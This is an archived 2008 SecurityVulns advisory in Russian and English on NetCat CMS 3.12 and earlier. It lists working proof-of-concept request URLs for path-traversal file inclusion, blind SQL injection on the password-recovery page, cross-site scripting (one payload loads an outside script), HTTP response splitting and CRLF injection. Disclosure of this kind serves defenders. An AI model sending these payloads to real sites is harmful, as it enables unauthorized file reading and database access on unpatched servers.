Многочисленные уязвимости в NetCat CMS <= 3.12

2008-12-23T00:00:00
ID SECURITYVULNS:DOC:21075
Type securityvulns
Reporter Securityvulns
Modified 2008-12-23T00:00:00

Description

Многочисленные уязвимости в NetCat CMS <= 3.12

Описание: Были обнаружены многочисленные уязвимости в CMS NetCat 3.12. Некоторым уязвимостям, перечисленным ниже, также подвержена версия NetCat 3.0.

  1. Множественные уязвимости типа "Чтение произвольных файлов" (File Including)

Уязвимость существует по причине того, что возможен прямой доступ к некоторым файлам, в обход логики работы приложения. Это дает возможность переопределить внутренние переменные, которые передаются в качестве аргументов в функцию include(). Примеры уязвимых файлов: /netcat/modules/netshop/post.php?system=../../../../.htaccess%00 /netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00

Примечание: Для эксплуатации уязвимости требуются следующие настройки PHP: register_globals=On (не для всех) и magic_quotes_gpc=Off

  1. Слепое выполнение произвольных SQL-запросов (Blind SQL Injection)

Уязвимость была обнаружена в следующем запросе: /netcat/modules/auth/password_recovery.php?=1'SQL_code

Пример эксплуатации: /netcat/modules/auth/password_recovery.php?=1'//OR//VERSION()//LIKE//'4%'/Примечание:Для эксплуатации уязвимости требуется отключенный magic_quotes_gpc.3. Уязвимости типа "Межсайтовое выполнение сценариев" (Cross-site Scripting,XSS)Уязвимости были обнаружены в следующих запросах: /netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" /netcat/FCKeditor/neditor.php?form=<XSS>&control=<XSS> и др.4. Расщепление HTTP-запроса (HTTP Response Splitting)Уязвимости были обнаружены в следующих запросах: /netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com /netcat/modules/linkmanager/redirect.php?url=http://www.google.com5. CRLF injectionУязвимость существует в момент установки значения %0a в переменные COOKIE.Уязвимость была обнаружена при обращении к файлу /netcat/add.php.- - -NetCat <= 3.12 Multiple Remote VulnerabilitiesThe description:The set vulnerability in CMS NetCat versions 3.12 and more low was revealed.1. Multiple File Including VulnerabilitiesVulnerability exists for the reason that direct access to some files, aroundlogicians of work of the appendix is possible.It gives the chance to redefine internal variables which are transferred asarguments in function include ().Examples of vulnerable files: /netcat/modules/netshop/post.php?system=../../../../.htaccess%00 /netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00The note:For vulnerability operation the following options PHP are required:register_globals=On and magic_quotes_gpc=Off2. Blind SQL Injection VulnerabilitiesExamples of vulnerable files: /netcat/modules/auth/password_recovery.php?=1'SQL_codeExample: /netcat/modules/auth/password_recovery.php?=1'//OR//VERSION()//LIKE//'4%'/The note:For vulnerability operation the following options PHP are required:magic_quotes_gpc=Off3. Multiple Cross-site Scripting VulnerabilitiesExamples of vulnerable files: /netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" /netcat/FCKeditor/neditor.php?form=<XSS>&control=<XSS> etc.4. HTTP Response SplittingExamples of vulnerable files: /netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com /netcat/modules/linkmanager/redirect.php?url=http://www.google.com5. CRLF injectionVulnerability exists at the moment of value installation %0a in COOKIEvariables.Vulnerability has been found out at the reference to a file /netcat/add.php.